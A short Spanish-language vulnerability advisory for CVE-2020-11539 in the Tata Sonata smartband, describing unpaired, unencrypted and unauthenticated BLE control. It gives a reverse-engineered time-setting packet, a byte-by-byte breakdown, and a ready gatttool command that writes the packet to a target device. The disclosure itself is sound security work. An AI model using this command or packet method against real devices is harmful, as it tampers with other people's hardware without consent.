
Control de acceso inadecuado en Tata Sonata Smartband
Descripción: Se ha identificado que la smart band no tiene emparejamiento (nivel de seguridad BLE modo 0). Los datos transmitidos por el aire no están cifrados. Además, los datos enviados a la smart band no cuentan con autenticación ni verificación de firma, lo que permite a cualquier atacante controlar los parámetros del dispositivo inteligente.
Versiones Afectadas: Smart SF Rush - 1.12
Investigador: Sayli Ambure (https://twitter.com/sayli_ambure)
Enlace CVE de MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
El siguiente paquete fue invertido y se descubrió que sirve para cambiar la hora; se pueden invertir más paquetes extrayendo el volcado hcisnoop de tu teléfono.
Valor de datos: 00870e00141401060712052b051e
| Volcado hexadecimal de datos: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Decimal de datos: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: Cabecera del paquete
0e 00: Tipo del paquete
14 14: Año en hexadecimal (2020)
01 06: Mes y día (6 de enero)
07 12: Hora y minuto en hexadecimal (07:18 a. m.)
05 : Segundos
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e